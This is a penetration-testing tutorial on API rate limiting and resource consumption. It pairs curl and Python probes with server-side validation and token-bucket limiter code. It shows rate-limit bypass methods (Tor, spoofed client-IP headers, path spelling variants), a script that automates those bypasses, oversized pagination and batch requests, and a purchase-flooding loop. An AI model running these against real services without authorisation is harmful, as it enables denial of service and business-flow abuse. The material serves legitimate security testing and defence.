API Security: API4 (Unrestricted Resource Consumption) and API6 (Unrestricted Access to Sensitive Business Flows)

Rate Limiting & DoS

APIs that lack proper rate limiting are vulnerable to Denial of Service (DoS), brute force attacks, and resource exhaustion. Attackers can also abuse business logic flows (like purchasing or voting) if they are not rate-limited.

Rate Limiting Detection

First, determine if rate limiting is in place and what the limits are.

Basic Testing

Send a burst of requests and tally the response codes: a run of 200s followed by 429 (some limiters answer 403 or 503 instead) marks the limit, and the number of accepted responses approximates the window size.

bash
for i in {1..100}; do
  curl -s -o /dev/null -w "%{http_code}\n" \
    -H "Authorization: Bearer $TOKEN" \
    https://api.target.com/api/users
done | sort | uniq -c

Response Headers

Check the response headers; many limiters advertise the quota and window before you ever hit it. Dump the headers rather than the body, and match both the X-RateLimit-* family and Retry-After (the original grep for "rate" misses Retry-After).

bash
# -D - writes response headers to stdout; -o /dev/null discards the body
curl -s -D - -o /dev/null -H "Authorization: Bearer $TOKEN" \
  https://api.target.com/api/users | grep -iE 'ratelimit|retry-after'

# Common headers (the IETF draft names drop the X- prefix, e.g. RateLimit-Limit):
# X-RateLimit-Limit: 100
# X-RateLimit-Remaining: 99
# X-RateLimit-Reset: 1640000000
# Retry-After: 60
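The two checks above, as one reusable probe in Python (an added example, not code from the original page): parse whatever rate-limit headers come back, and fire requests back to back until the first 429 to learn how big the burst window is. The transport is a plain callable so the same logic runs offline against a constructed stand-in (`FakeApi`, assumed here: 25 requests then 429) and, via `urllib_sender`, against a real target you are authorised to test.

```python
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional, Tuple

# A response is (status code, response headers).
Response = Tuple[int, Dict[str, str]]

# Header families that advertise a limit: the common X-RateLimit-* set, the
# IETF draft RateLimit-* set, and Retry-After (seconds or an HTTP-date).
RATE_HEADERS = {
    "x-ratelimit-limit", "x-ratelimit-remaining", "x-ratelimit-reset",
    "ratelimit-limit", "ratelimit-remaining", "ratelimit-reset", "retry-after",
}


def parse_rate_limit_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """Keep only the rate-limit related headers, with lower-cased names."""
    return {k.lower(): v for k, v in headers.items() if k.lower() in RATE_HEADERS}


def find_burst_threshold(send: Callable[[], Response], max_requests: int = 200) -> dict:
    """Send requests back to back until the first 429.

    Returns how many requests were accepted before throttling, whether a 429
    was seen at all within max_requests, and the limit headers of the 429.
    """
    accepted = 0
    for _ in range(max_requests):
        status, hdrs = send()
        if status == 429:
            return {"accepted": accepted, "throttled": True,
                    "limit_headers": parse_rate_limit_headers(hdrs)}
        accepted += 1
    return {"accepted": accepted, "throttled": False, "limit_headers": {}}


def urllib_sender(url: str, token: Optional[str] = None) -> Callable[[], Response]:
    """Real transport (stdlib only) for a target you are authorised to test."""
    headers = {"Authorization": f"Bearer {token}"} if token else {}

    def send() -> Response:
        req = urllib.request.Request(url, headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, dict(resp.headers.items())
        except urllib.error.HTTPError as err:   # 4xx/5xx are raised by urllib
            return err.code, dict(err.headers.items())

    return send


class FakeApi:
    """Constructed stand-in for api.target.com: a fixed window of `limit`
    requests, then 429 with Retry-After.  Not a real server."""

    def __init__(self, limit: int = 25) -> None:
        self.limit = limit
        self.seen = 0

    def send(self) -> Response:
        self.seen += 1
        remaining = max(self.limit - self.seen, 0)
        hdrs = {"Content-Type": "application/json",
                "X-RateLimit-Limit": str(self.limit),
                "X-RateLimit-Remaining": str(remaining)}
        if self.seen > self.limit:
            hdrs["Retry-After"] = "60"
            return 429, hdrs
        return 200, hdrs


if __name__ == "__main__":
    # Offline demo; swap in urllib_sender("https://api.target.com/api/users", token)
    # for a live run.
    print(find_burst_threshold(FakeApi(limit=25).send))
```

Run the probe once per endpoint class (read, write, auth) since limits usually differ, and note whether `accepted` stays constant across runs: a fixed window resets on the clock, a sliding window drifts.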

Rate Limit Bypass

If rate limiting is detected, try to bypass it using various techniques.

1. IP Rotation

If limits are keyed on the source IP, rotate it: Tor, a proxy pool, or multiple cloud egress addresses. Expect Tor exit nodes to be blocked or down-scored by many providers.

bash
# requires a local Tor daemon on 9050; socks5h also resolves DNS through the proxy
curl --proxy socks5h://127.0.0.1:9050 https://api.target.com/api/users

2. Header Manipulation

Present a different client address in headers like X-Forwarded-For. This only works when the application, or a misconfigured reverse proxy in front of it, takes the client address from an untrusted header; vary the value per request, since a single fixed value just moves you into one new bucket.

bash
# Each works only if the app/proxy reads the client IP from that header
curl -H "X-Forwarded-For: 127.0.0.1" https://api.target.com/api/users
curl -H "X-Real-IP: 10.0.0.1" https://api.target.com/api/users
curl -H "X-Originating-IP: 192.168.1.1" https://api.target.com/api/users
curl -H "X-Client-IP: 172.16.0.1" https://api.target.com/api/users

3. Endpoint Variation

If the limiter keys on the raw request path while the router normalises case, trailing slashes or percent-encoding, every spelling of the endpoint gets its own bucket. Try version, case and encoding variants (whether %20 and %00 are stripped depends on the framework):

  • /api/v1/users
  • /api/v2/users
  • /api/users
  • /v1/api/users
  • /api/Users
  • /API/USERS
  • /Api/Users
  • /api/users/
  • /api/users%20
  • /api/users%00
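A probe that exercises both the Header Manipulation and Endpoint Variation techniques above, as an added Python example (not code from the original page): it first exhausts the baseline until a 429 appears, then reports which path spellings and which client-address headers still get a 2xx. `WeakTarget` is a constructed stand-in that has both mistakes on purpose (limit keyed on the raw path string, first X-Forwarded-For value trusted); `send` is a callable so the probe can be pointed at curl or urllib for a real, authorised test.

```python
from typing import Callable, Dict, List

# send(path, extra_headers) -> HTTP status.  Wrap curl/urllib here for a live run.
Send = Callable[[str, Dict[str, str]], int]

# Client-address headers that a misconfigured proxy or app may honour.
SPOOF_HEADER_SETS: List[Dict[str, str]] = [
    {"X-Forwarded-For": "127.0.0.1"},
    {"X-Real-IP": "10.0.0.1"},
    {"X-Originating-IP": "192.168.1.1"},
    {"X-Client-IP": "172.16.0.1"},
]


def endpoint_variants(path: str) -> List[str]:
    """Version, case, trailing-slash and encoding variants of one path."""
    base = "/" + path.strip("/")
    segs = base.strip("/").split("/")
    cands = [
        base,
        base + "/",
        base + "%20",
        base + "%00",
        base.upper(),
        "/" + "/".join(s.capitalize() for s in segs),          # /Api/Users
        "/" + "/".join(segs[:-1] + [segs[-1].capitalize()]),    # /api/Users
        "/" + "/".join([segs[0], "v1"] + segs[1:]),             # /api/v1/users
        "/" + "/".join([segs[0], "v2"] + segs[1:]),
        "/v1" + base,
    ]
    out: List[str] = []
    for c in cands:                      # keep order, drop duplicates
        if c not in out:
            out.append(c)
    return out


def exhaust(send: Send, path: str, max_requests: int = 500) -> bool:
    """Hit the baseline until it is throttled; False if it never returns 429."""
    for _ in range(max_requests):
        if send(path, {}) == 429:
            return True
    return False


def probe_bypasses(send: Send, path: str) -> Dict[str, List[str]]:
    """After the baseline is throttled, report which variants still get 2xx.

    A path variant that succeeds means the limiter keys on the raw request
    path; a header that succeeds means the client address is taken from a
    client-controlled header.
    """
    if not exhaust(send, path):
        return {"paths": [], "headers": [], "note": ["baseline never throttled"]}
    paths = [v for v in endpoint_variants(path)
             if v != path and 200 <= send(v, {}) < 300]
    headers = [",".join(sorted(h)) for h in SPOOF_HEADER_SETS
               if 200 <= send(path, h) < 300]
    return {"paths": paths, "headers": headers, "note": []}


class WeakTarget:
    """Constructed target with two classic mistakes: the limit is keyed on the
    raw path string, and the first X-Forwarded-For value is trusted as the
    client IP.  20 requests per key, then 429.  Not a real server."""

    def __init__(self, limit: int = 20) -> None:
        self.limit = limit
        self.counts: Dict[tuple, int] = {}

    def send(self, path: str, headers: Dict[str, str]) -> int:
        ip = headers.get("X-Forwarded-For", "203.0.113.5").split(",")[0].strip()
        key = (ip, path)
        self.counts[key] = self.counts.get(key, 0) + 1
        return 429 if self.counts[key] > self.limit else 200


if __name__ == "__main__":
    print(probe_bypasses(WeakTarget().send, "/api/users"))
```

Against a real target, a variant that returns 404 rather than 200 is not a bypass; only a 2xx after the baseline has been throttled counts, and each successful variant should be re-checked in a second burst to confirm it has its own budget rather than having slipped through a window reset.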

Resource Consumption

Test for endpoints that consume excessive resources.

Large Response Testing

Request large amounts of data via pagination or limit parameters.

http
GET /api/users?limit=10000
GET /api/users?page=1&per_page=999999
GET /api/search?q=a&results=all

Deep Pagination

With OFFSET-based pagination the database still reads and discards page × per_page rows before returning anything, so a very high page number costs close to a full scan per request.

http
GET /api/items?page=1000000

Field Expansion

Wildcard field selection or unbounded include/expand parameters turn one query into many joins or N+1 lookups, so a single request can be far more expensive than its size suggests.

http
GET /api/users?fields=*
GET /api/users?include=all,nested,relations

Batch Requests

Send a large number of operations in a single batch request; with no cap on the array size, one request fans out into thousands of lookups.

http
POST /api/batch
Content-Type: application/json

{"ids": [1,2,3,...thousands of IDs...]}
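The server-side counterpart to the four resource-consumption tests above, as an added Python example (not code from the original page): a validator that clamps `limit`/`per_page`, rejects offset pages past a cap (pointing the client at cursor pagination), allows only known `fields` and `include` values, and bounds batch arrays. The caps and the field names are assumptions for the sake of the example; `BadRequest` is meant to map to an HTTP 400 in the handler.

```python
from dataclasses import dataclass
from typing import Any, Callable, Dict, List, Optional

MAX_PER_PAGE = 100        # hard cap regardless of what the client asks for
MAX_PAGE = 1000           # offset pagination beyond this: require a cursor
MAX_BATCH_IDS = 100
MAX_INCLUDES = 2
ALLOWED_FIELDS = {"id", "username", "email", "created_at"}   # assumed schema
ALLOWED_INCLUDES = {"profile", "roles"}


class BadRequest(Exception):
    """Maps to HTTP 400 in the handler."""


@dataclass
class ListQuery:
    per_page: int
    page: int
    fields: List[str]
    include: List[str]


def _bounded_int(raw: Optional[str], name: str, lo: int, hi: int,
                 default: int, clamp: bool) -> int:
    if raw in (None, ""):
        return default
    try:
        val = int(raw)
    except ValueError:
        raise BadRequest(f"{name} must be an integer") from None
    if val < lo:
        raise BadRequest(f"{name} must be >= {lo}")
    if val > hi:
        if clamp:
            return hi
        raise BadRequest(f"{name} above {hi}: use cursor pagination")
    return val


def _csv(raw: Optional[str]) -> List[str]:
    return [s.strip() for s in raw.split(",") if s.strip()] if raw else []


def parse_list_query(params: Dict[str, str]) -> ListQuery:
    """Validate ?limit/?per_page, ?page, ?fields and ?include before the data layer."""
    per_page = _bounded_int(params.get("per_page", params.get("limit")),
                            "per_page", 1, MAX_PER_PAGE, 20, clamp=True)
    page = _bounded_int(params.get("page"), "page", 1, MAX_PAGE, 1, clamp=False)
    fields = _csv(params.get("fields")) or sorted(ALLOWED_FIELDS)
    unknown = set(fields) - ALLOWED_FIELDS            # "*" lands here
    if unknown:
        raise BadRequest(f"unknown fields: {sorted(unknown)}")
    include = _csv(params.get("include"))
    unknown = set(include) - ALLOWED_INCLUDES         # "all", "nested" land here
    if unknown:
        raise BadRequest(f"unknown include: {sorted(unknown)}")
    if len(include) > MAX_INCLUDES:
        raise BadRequest(f"at most {MAX_INCLUDES} includes per request")
    return ListQuery(per_page, page, fields, include)


def parse_batch_ids(body: Dict[str, Any]) -> List[int]:
    """Bound the size of a batch request and reject non-integer ids."""
    ids = body.get("ids")
    if not isinstance(ids, list):
        raise BadRequest("ids must be a list")
    if len(ids) > MAX_BATCH_IDS:
        raise BadRequest(f"at most {MAX_BATCH_IDS} ids per batch")
    if not all(type(i) is int and i > 0 for i in ids):   # bool is not an id
        raise BadRequest("ids must be positive integers")
    return sorted(set(ids))                               # de-duplicate


def is_rejected(fn: Callable[..., Any], *args: Any) -> bool:
    """True if the validator raises BadRequest for these arguments."""
    try:
        fn(*args)
    except BadRequest:
        return True
    return False
```

Clamping `per_page` silently while rejecting an over-large `page` is a deliberate split: a smaller page is still a correct answer, whereas a page the server will not serve needs an explicit error that tells the client to switch to a cursor.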

Business Flow Abuse

Automate business actions like purchasing, voting or account creation; without per-user velocity limits a script can drain stock, stuff a ballot or create thousands of accounts.

bash
for i in {1..100}; do
  curl -s -o /dev/null -w "%{http_code}\n" -X POST \
    -H "Authorization: Bearer $TOKEN" \
    -H "Content-Type: application/json" \
    https://api.target.com/api/purchase -d '{"item_id": 1}'
done | sort | uniq -c

Remediation

Defense Strategies

  • Rate limit every endpoint (e.g., a Token Bucket per identity) and key the limit on the authenticated user or API key, falling back to the client IP only for unauthenticated routes; answer with 429 and Retry-After.
  • Take the client IP from the TCP peer and honour X-Forwarded-For only when a trusted proxy set it; ignore X-Real-IP, X-Client-IP and similar headers supplied by clients.
  • Normalise the request path (case, trailing slash, percent-encoding) before any routing or limiting decision, or key the limit on the identity rather than the path so spelling variants share one bucket.
  • Limit payload sizes (e.g., max JSON body size, max file upload size) and cap batch arrays at a fixed number of items.
  • Enforce pagination limits (e.g., max 100 items per page), bound offset pagination or replace it with cursor pagination, reject wildcard field selection and bound include/expand depth.
  • Set timeouts for all API operations, including upstream database and HTTP calls.
  • Apply tighter, per-user velocity limits to sensitive business flows (purchase, vote, signup), with step-up checks such as CAPTCHA or device signals when abuse is detected.
  • Use a Web Application Firewall (WAF) or API gateway to absorb volumetric DoS, but not as the only control.
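A limiter that implements the first three strategies above and closes the bypasses from the Rate Limit Bypass section, as an added Python example (not code from the original page): a token bucket keyed on the authenticated identity with a second, tighter bucket for sensitive business flows; the client IP taken from the TCP peer, with X-Forwarded-For honoured only from a trusted proxy network; and path normalisation so case, trailing-slash and encoding variants cannot dodge the sensitive-route check. The trusted network, the policies and the sensitive prefixes are assumptions for the example. Time is passed in explicitly so the logic can be exercised offline; pass `time.monotonic()` in production.

```python
import ipaddress
import math
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# Assumed deployment: only these networks host the reverse proxies that may set
# X-Forwarded-For.  Any other peer is a direct client whose headers are ignored.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

# (burst capacity, refill tokens per second).  "default" applies to every
# request of an identity; "sensitive" is an extra, tighter bucket for business
# flows that must never run at machine speed.  Values are assumptions.
POLICIES: Dict[str, Tuple[int, float]] = {
    "default": (100, 100 / 60),    # 100 requests per minute
    "sensitive": (5, 5 / 60),      # 5 per minute
}
SENSITIVE_PREFIXES = ("/api/purchase", "/api/vote", "/api/auth/login")


class TokenBucket:
    def __init__(self, capacity: int, refill: float, now: float) -> None:
        self.capacity, self.refill = capacity, refill
        self.tokens, self.updated = float(capacity), now

    def take(self, now: float) -> bool:
        elapsed = max(0.0, now - self.updated)
        self.tokens = min(float(self.capacity), self.tokens + elapsed * self.refill)
        self.updated = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False

    def retry_after(self) -> int:
        """Whole seconds until one token is available again."""
        return max(1, math.ceil(round((1.0 - self.tokens) / self.refill, 3)))


def normalize_path(path: str) -> str:
    """Fold case, encoding, NUL/space tails and slash variants onto one path."""
    p = unquote(path.split("?", 1)[0]).replace("\x00", "").strip().lower()
    p = re.sub(r"/+", "/", p).rstrip("/")
    return p or "/"


def client_ip(peer_ip: str, headers: Dict[str, str]) -> str:
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy, and then
    use the right-most entry (the one that proxy appended), never the left-most
    client-supplied value.  All other IP headers are ignored."""
    peer = ipaddress.ip_address(peer_ip)
    xff = headers.get("X-Forwarded-For", "")
    if xff and any(peer in net for net in TRUSTED_PROXIES):
        hops = [h.strip() for h in xff.split(",") if h.strip()]
        try:
            return str(ipaddress.ip_address(hops[-1]))
        except (ValueError, IndexError):
            pass
    return peer_ip


def request_identity(user_id: Optional[str], peer_ip: str, headers: Dict[str, str]) -> str:
    """Authenticated traffic is keyed on the principal, not on the address."""
    return f"user:{user_id}" if user_id else f"ip:{client_ip(peer_ip, headers)}"


class RateLimiter:
    def __init__(self) -> None:
        self.buckets: Dict[Tuple[str, str], TokenBucket] = {}

    def check(self, identity: str, path: str, now: float) -> Tuple[int, Dict[str, str]]:
        """Returns (status, headers): 200 to proceed, 429 to reject."""
        classes: List[str] = ["default"]
        if normalize_path(path).startswith(SENSITIVE_PREFIXES):
            classes.append("sensitive")
        last = None
        for cls in classes:
            cap, rate = POLICIES[cls]
            bucket = self.buckets.get((identity, cls))
            if bucket is None:
                bucket = self.buckets[(identity, cls)] = TokenBucket(cap, rate, now)
            if not bucket.take(now):
                return 429, {"Retry-After": str(bucket.retry_after()),
                             "X-RateLimit-Limit": str(cap), "X-RateLimit-Remaining": "0"}
            last = bucket
        return 200, {"X-RateLimit-Limit": str(last.capacity),
                     "X-RateLimit-Remaining": str(int(last.tokens))}
```

Because the default bucket is keyed on the identity alone, `/api/Users`, `/API/USERS` and `/v1/api/users` all draw from the same budget even though only the sensitive-route check depends on the normalised path. In a multi-instance deployment the bucket store would live in a shared store such as Redis rather than in-process memory; the logic is unchanged.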